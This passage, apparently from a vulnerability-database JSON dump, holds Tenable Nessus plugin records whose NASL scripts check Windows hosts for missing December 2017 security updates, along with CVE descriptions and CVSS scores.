This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4054517/windows-10-update-kb4054517\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a819f12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4054517.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4054517');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4054517])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:31", "description": "The remote Windows host is missing security update 4053581.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. 
In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11910, CVE-2017-11918)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. 
This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "KB4053581: Windows 10 December 2017 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11910", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2020-08-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_DEC_4053581.NASL", "href": "https://www.tenable.com/plugins/nessus/105182", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105182);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11888\",\n \"CVE-2017-11889\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11899\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11910\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11918\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102065,\n 102077,\n 102078,\n 102080,\n 102082,\n 102086,\n 102089,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4053581\");\n script_xref(name:\"MSFT\", value:\"MS17-4053581\");\n\n script_name(english:\"KB4053581: Windows 10 December 2017 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4053581.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. 
The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11899)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11889,\n CVE-2017-11910, CVE-2017-11918)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11888)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. 
This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4053581/windows-10-update-kb4053581\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfb1aa54\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4053581.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4053581');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4053581])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:42:20", "description": "The remote Windows host is missing security update 4054521 or cumulative update 4054518. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. 
This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 December 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_4054518.NASL", "href": "https://www.tenable.com/plugins/nessus/105184", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105184);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102078,\n 102082,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4054521\");\n script_xref(name:\"MSKB\", value:\"4054518\");\n script_xref(name:\"MSFT\", value:\"MS17-4054521\");\n script_xref(name:\"MSFT\", value:\"MS17-4054518\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 December 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4054521\nor cumulative update 4054518. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. 
This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4054521/windows-7-update-kb4054521\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb7927f1\");\n # https://support.microsoft.com/en-us/help/4054518/windows-7-update-kb4054518\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db8ca30f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4054521 or Cumulative update KB4054518.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4054521', '4054518');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4054521, 4054518])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:31", "description": "The remote Windows host is missing security update 4054522 or cumulative update 4054519. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. 
This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 December 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_4054519.NASL", "href": "https://www.tenable.com/plugins/nessus/105185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105185);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11919\",\n \"CVE-2017-11927\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102054,\n 102055,\n 102058,\n 102062,\n 102063,\n 102078,\n 102082,\n 102091,\n 102092,\n 102093,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4054522\");\n script_xref(name:\"MSKB\", value:\"4054519\");\n script_xref(name:\"MSFT\", value:\"MS17-4054522\");\n script_xref(name:\"MSFT\", value:\"MS17-4054519\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 December 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by 